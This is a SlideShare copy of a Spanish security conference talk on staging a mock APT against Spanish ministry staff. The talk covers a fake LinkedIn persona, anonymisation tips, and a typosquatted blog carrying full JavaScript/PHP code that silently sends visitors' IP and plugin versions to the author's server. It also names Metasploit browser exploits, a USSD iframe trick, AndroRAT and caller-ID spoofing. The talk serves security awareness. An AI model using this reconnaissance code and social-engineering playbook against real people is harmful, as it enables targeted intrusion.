SlideShare una empresa de Scribd logo
1 de 42
Descargar para leer sin conexión
‹#›
Rooted Satellite Valencia
SbD
Buenas	
  Prác,cas	
  Forenses:

Casos	
  reales	
  en	
  IOS	
  y	
  Linux
Cooking an APT…
in the paranoid way
Lorenzo Martínez R. (@lawwait)
[root@localhost ~]# whoami
CTO && Founder www.securizame.com
!
www.SecurityByDefault.com
!
Perito Informático Forense
!
Twitter:
– @lawwait
– @securizame
– @secbydefault
!
Email: lorenzo@securizame.com
Historia y agradecimientos
Anterior estudio y experiencia para empresa privada
Generación de APT real
Legalidad del APT
Lecciones aprendidas y extrapolación
Thanks to:
– Yago Jesús… Tons of thanks!
– Grupo de Delitos Telemáticos de la Guardia Civil
Sector público: soy ciudadano
Hasta el Ministerio y más allá…!!!
Disclaimer
Para llevar a cabo esta charla, durante la ejecución
de la investigación, se cometieron varias
irregularidades.
El objetivo de la misma es meramente académico,
sin intención de herir ninguna sensibilidad, ni
ridiculizar a nadie
No hagáis esto en casa!!!
A Pwnearlo Todo!!!
A Ponerte hacia Toledo!!!
A Putearte También…
!
A Por Todas!
Confidencialidad
Planificando el APT
El objetivo y su perfil
El punto de entrada
Un perfil con historia creible
Correo electrónico
Vida en redes sociales: Facebook, LinkedIN, Twitter?,
Whatsapp?
Web personal con venenos
Material inicial
Ordenador
Disco duro cifrado de host -> Filevault/Bitlocker/
LUKS/¿Truecrypt?
Distribución Live de usar y tirar en máquina virtual
Tarjeta de red wireless externa + cambio de
dirección MAC
Random Agent Spoofer
KeePassX
Más Material Necesario
Terminal telefónico (IMEI no asociado)
– Smartphone
– Tienda de segunda mano
– Tienda de accesorios para móviles
!
Tarjeta SIM
– Prepago
– DNI
– Ingeniería Social
– else… para SMS
– http://sms-verification.com
– http://receivefreesms.com
Recursos necesarios… y anonimización
!
Correo electrónico
!
Cuenta en BitCoins
!
UKASH 2 Bitcoins
!
Canal cifrado, anónimo y sin logs
!
Free website!
Máquina de salto
Máquina virtual guest con FS cifrado,… sobre sistema de
ficheros cifrado en el host
Squid configurado en modo anónimo
VPN hacia iPredator:
– Ruta directa hacia iPredator mediante gateway normal
– Default gateway en el extremo del túnel
– Firewall entrante en interfaz tun0
Opcional: ¿Acceso encapsulado mediante TOR?
Navegación local a través de proxy con Random Agent
Spoofer
¿A quién vamos a liar?
Creamos un perfil LinkedIN
Siempre a través de VPN
Comprobación de dirección IP, antes de cualquier cosa
Navegación en “modo porno”
Tráfico de relleno variado: emule
Nos piden una dirección de correo electrónico
Perfil:
– Nombre: Sugerente, no común,… pero sin pasarse
– Nuestra foto
– Presente y pasado
Veneno: Sitio web personal
¿Hasta dónde quiero llegar?
Preparación de la web maliciosa
– Fecha
– Dirección IP
– Referer
– User agent
– Versiones de:
• Java
• Flash
• Quicktime
!
• Shockwave
• WMP
• Silverlight
• RealPlayer
• IEComponent
• ActiveX
• PDFjs
Plugins detector (I)
http://www.pinlady.net/PluginDetect/download
<script type="text/javascript" src="hello.js"></script>
<div style="position:relative;">
<div id="plugindetect" style=“position:absolute; left:0px; top:0px;”></div>
!
<script type="text/javascript">!
var ip = "<?php echo $_SERVER['SERVER_ADDR']; ?>";!
var user_agent = "<?php echo $_SERVER['HTTP_USER_AGENT']; ?>";!
var referrer = "<?php echo $_SERVER['HTTP_REFERER']; ?>";!
!
var today = new Date();!
var dd = today.getDate();!
var mm = today.getMonth()+1; //Enero empieza en 0!
var yyyy = today.getFullYear();!
var hh = today.getHours();!
var min = today.getMinutes();!
var seg = today.getSeconds ();
Plugins detector (II)
if (dd<10) { dd=‘0'+ dd } !
if (mm<10) { mm=‘0’+ mm } !
if (hh<10) { hh=‘0'+ hh }!
if (min<10) { min ='0'+ min }!
if (seg<10) { seg ='0'+ seg }!
var datetime = dd + "/"+ mm + "/" + yyyy + " "+ hh + ":" + min + ":" + seg;
var width = screen.width;
var height = screen.height;
var flashversion = PluginDetect.getVersion("Flash");
var Java= PluginDetect.getVersion("Java");
var Quicktime = PluginDetect.getVersion("Quicktime");
var Shockwave = PluginDetect.getVersion("Shockwave");
var WMP = PluginDetect.getVersion("WMP");
var Silverlight = PluginDetect.getVersion("Silverlight");
var RealPlayer = PluginDetect.getVersion("RealPlayer");
var IEcomponent = PluginDetect.getVersion("IEcomponent");
var ActiveX = PluginDetect.getVersion("ActiveX");
var PDFjs = PluginDetect.getVersion("PDF.js");
var keep= datetime+ "|IP: " + ip + "|User-Agent " + user_agent + "|Resolution: " +
width +"x"+ height + "|Referer: " + referrer + "|Java: " + Java + "|Flashversion: "+
flashversion + "|Quicktime: " + Quicktime + "|Shockwave: " + Shockwave + "|WMP: " +
WMP + "|Silverlight: " + Silverlight + "|RealPlayer: " + RealPlayer + "|IEComponent: "
+ IEcomponent + "|ActiveX: " + ActiveX + "|PDFjs: " + PDFjs+"n"
Plugins detector (III)
var form = document.createElement(‘form');!
form.setAttribute ("method", “POST");!
form.setAttribute("action", “http://www.noenavarro.site90.com/main.php”);!
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "data");
hiddenField.setAttribute("value", keep);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
<?php
if(!empty($_POST['data']))
{
$data = $_POST['data'];
$fname = "stats.txt";
$file = fopen($fname, 'a');
fwrite($file, $data);
fclose($file);
}?>
<img src= en_construccion.png>
main.php
stats.txt
29/06/2014 14:42:01|IP: 31.170.162.223|User-Agent Mozilla/5.0
(Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/35.0.1916.153 Safari/537.36 OPR/22.0.1471.70|
Referer: |Javanull|Flashversion 13,0,0,0|Quicktime 7,7,3,0|
Shockwave 12,1,0,0|WMP null|Silverlight 5,1,30317,0|RealPlayer
null|IEComponent null|ActiveX null|PDFjs null
| como separador de campos
Importable en Excel
Estrategia LinkedIN
Horarios de funcionarios
– 8:00 - 15:00 -> Mayor probabilidad de PC corporativo
– 15:00 - XX:XX -> Dispositivo móvil
Dificultad de búsquedas
Visita de perfiles
Target al Ministerio deseado… abriendo el abanico
Generación de confianza: contactos de ambos sexos, contactos de vidas
pasadas (trabajos anteriores, alumnos del colegio, skills y hobbies, etc,…)
Adición a grupos relacionados + Google hacking
Contactos recomendados
Inconveniente añadido: Vacaciones de verano…
Anécdotas LinkedIN
Los DMs
– El desconfiado/suspicaz
– El curioso extrovertido
El linkedin addict!
El que pica el anzuelo
Los “endorsements”
Las felicitaciones por mi actividad
Los múltiples “acojonos”
Be Paranoid
Mi blog
• Enlace acortado por el propio LinkedIn
• www.noenavarro.site90.com/portugaI.php
• Typosquatting -> portugaI.php vs. portugal.php
Mi blog
portugaI.php
…<snip>
var keep= datetime+ "|IP: " + ip + "|User-Agent " + user_agent + "|Resolution: " + width +"x"+
height + "|Referer: " + referrer + "|Java: " + Java + "|Flashversion: "+ flashversion + "|
Quicktime: " + Quicktime + "|Shockwave: " + Shockwave + "|WMP: " + WMP + "|Silverlight: " +
Silverlight + "|RealPlayer: " + RealPlayer + "|IEComponent: " + IEcomponent + "|ActiveX: " +
ActiveX + "|PDFjs: " + PDFjs+"n"
var form = document.createElement('form');
form.setAttribute ("method", "POST");
form.setAttribute("action", "http://www.noenavarro.site90.com/portugal.php");
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "data");
hiddenField.setAttribute("value", keep);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
</snip>…
Mi blog
• portugal.php
<html>
<?php
if(!empty($_POST['data']))
{
$data = $_POST['data'];
$fname = "stats.txt";
$file = fopen($fname, 'a');
fwrite($file, $data);
fclose($file);
}
?>
!
<body bgcolor="#D3D3D3">
<basefont color="black" face="arial" size="14">
<style>
#marco img {
border: 2px solid #c3c3c3;
background: #ffffff;
padding:5px;
display:block;
}
</style>
<h1>Blog personal de Noelia Navarro</h1>
<h3>
¡Hola lectores! <p>
…
• HTML puro
!
• Borrado metadatos en las fotos (sean o no sean
tuyas)
!
• Redacción adecuada al perfil psicológico del
personaje representado
!
• Faltas de ortografía sutiles
Mi blog
Yo quiero tener un millón de amigos…
29 contactos
Y tú, ¿de quién eres?
Clientes vulnerables
IOS 7.1.1 -> http://support.apple.com/kb/HT6297
Android 2.3.6!!!
Java 1.6.0.29 (Sobre Windows 7)
Java 1.6.0.32 (Sobre Windows XP)
Flash 11.4.402.265
Silverlight 5.1.10411.0
Else… Lo que “podría” haber hecho
Registro de dominio g0b.es
VPS 4 Bitcoins
Else… Lo que “podría” haber hecho
Lo que “podría” haber hecho: lo fácil
use auxiliary/server/browser_autopwn
En base al navegador según user_agent, redirección adecuada
– Windows: Java, Flash, Silverlight,…
– IOS:
– Phishing por time-out
– Poner en title una URL válida,…
– Android:
– use exploit/android/browser/
webview_addjavascriptinterface (CVE-2013-4710)
– USSD -> <iframe> tel: </iframe>
Lo que “podría” haber hecho: personalizado
Lo que “podría” haber hecho
AndroRAT
• Compra de certificado SSL (Comodo)
Else… Lo que podría haber hecho
Spoofing de llamada
iPredator
!
Google Hangouts Dialer
!
Spoofcard
!
Pranking:
– Número de “mi ministerio”
– Modificación de voz
– Grabación de llamada
Sé lo que hiciste el último verano…
Hasta pronto!! (Tres años y un día)Disclaimers y Conclusiones
Para llevar a cabo esta charla, durante la ejecución
de la investigación, se cometieron varias
irregularidades
El objetivo de la misma es meramente académico (y
para esta conferencia), sin intención de herir ninguna
sensibilidad, ni ridiculizar a nadie
He cedido todo el material y explicaciones con mayor
detalle al Grupo de Delitos Telemáticos de la Guardia
Civil
Email me: lorenzo@securizame.com
Twitter: @lawwait @securizame @secbydefault
SbD

Más contenido relacionado

Destacado

Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]RootedCON
 
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]RootedCON
 
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...RootedCON
 
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]RootedCON
 
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...RootedCON
 
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...RootedCON
 
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]RootedCON
 
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]RootedCON
 
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...RootedCON
 
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]RootedCON
 
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...RootedCON
 
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]RootedCON
 
Conferencia de apertura [Rooted CON 2014]
Conferencia de apertura [Rooted CON 2014]Conferencia de apertura [Rooted CON 2014]
Conferencia de apertura [Rooted CON 2014]RootedCON
 
Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...
Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...
Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...RootedCON
 
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...RootedCON
 
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]RootedCON
 
Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...
Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...
Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...RootedCON
 
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...RootedCON
 
Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]
Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]
Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]RootedCON
 
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...RootedCON
 

Destacado (20)

Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
 
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
 
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
 
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
 
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
 
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
 
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
 
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
 
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
 
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
 
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
 
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
 
Conferencia de apertura [Rooted CON 2014]
Conferencia de apertura [Rooted CON 2014]Conferencia de apertura [Rooted CON 2014]
Conferencia de apertura [Rooted CON 2014]
 
Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...
Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...
Juan Vazquez & Julián Vilas – Tú a Barcelona y yo a Tejas, a patadas con mi S...
 
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
 
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
 
Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...
Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...
Roberto Baratta – Monetización de seguridad: de más con menos a más con nada ...
 
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
 
Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]
Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]
Joaquín Moreno Garijo – Forense a bajo nivel en Mac OS X [Rooted CON 2014]
 
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
 

Similar a APT en

HTML 5 & WebGL (Spanish Version)
HTML 5 & WebGL (Spanish Version)HTML 5 & WebGL (Spanish Version)
HTML 5 & WebGL (Spanish Version)Iran Reyes Fleitas
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesPablo Garaizar
 
Final portafolio 3 c (1)
Final portafolio 3 c (1)Final portafolio 3 c (1)
Final portafolio 3 c (1)JuanSimbaa8
 
[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...
[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...
[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...Iván Portillo
 
Curso de Desarrollo Web de Platzi
Curso de Desarrollo Web de PlatziCurso de Desarrollo Web de Platzi
Curso de Desarrollo Web de PlatziCarlos Azaustre
 
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...Wiktor Nykiel ✔
 
eyeOS: Arquitectura y desarrollo de una aplicación
eyeOS: Arquitectura y desarrollo de una aplicacióneyeOS: Arquitectura y desarrollo de una aplicación
eyeOS: Arquitectura y desarrollo de una aplicaciónJose Luis Lopez Pino
 
Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012iesgrancapitan.org
 
Potencia Tu Sitio Web De La Mano De Internet Explorer 8
Potencia Tu Sitio Web De La Mano De Internet Explorer 8Potencia Tu Sitio Web De La Mano De Internet Explorer 8
Potencia Tu Sitio Web De La Mano De Internet Explorer 8Andrés Iturralde
 
Google Analytics para Desarrolladores
Google Analytics para DesarrolladoresGoogle Analytics para Desarrolladores
Google Analytics para DesarrolladoresBruno Barbieri
 

Similar a APT en (20)

Unidad 3 AJAX
Unidad 3 AJAX Unidad 3 AJAX
Unidad 3 AJAX
 
Unidad3ajax
Unidad3ajaxUnidad3ajax
Unidad3ajax
 
HTML 5 & WebGL (Spanish Version)
HTML 5 & WebGL (Spanish Version)HTML 5 & WebGL (Spanish Version)
HTML 5 & WebGL (Spanish Version)
 
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
 
APIs de medios sociales
APIs de medios socialesAPIs de medios sociales
APIs de medios sociales
 
Cien usos con serverless
Cien usos con serverlessCien usos con serverless
Cien usos con serverless
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
Final portafolio 3 c (1)
Final portafolio 3 c (1)Final portafolio 3 c (1)
Final portafolio 3 c (1)
 
Seguridad en PHP (es)
Seguridad en PHP (es)Seguridad en PHP (es)
Seguridad en PHP (es)
 
Curso de HTML5
Curso de HTML5Curso de HTML5
Curso de HTML5
 
[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...
[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...
[2020] OSINTCity - Ciberinteligencia: Surface Crawling - Ivan Portillo y Gonz...
 
Curso de Desarrollo Web de Platzi
Curso de Desarrollo Web de PlatziCurso de Desarrollo Web de Platzi
Curso de Desarrollo Web de Platzi
 
Twevelop
TwevelopTwevelop
Twevelop
 
Web Scrapping & WordPress
Web Scrapping & WordPressWeb Scrapping & WordPress
Web Scrapping & WordPress
 
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
 
eyeOS: Arquitectura y desarrollo de una aplicación
eyeOS: Arquitectura y desarrollo de una aplicacióneyeOS: Arquitectura y desarrollo de una aplicación
eyeOS: Arquitectura y desarrollo de una aplicación
 
Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012Taller Hacking Ético #Sysmana2012
Taller Hacking Ético #Sysmana2012
 
Potencia Tu Sitio Web De La Mano De Internet Explorer 8
Potencia Tu Sitio Web De La Mano De Internet Explorer 8Potencia Tu Sitio Web De La Mano De Internet Explorer 8
Potencia Tu Sitio Web De La Mano De Internet Explorer 8
 
Google Analytics para Desarrolladores
Google Analytics para DesarrolladoresGoogle Analytics para Desarrolladores
Google Analytics para Desarrolladores
 

Más de RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
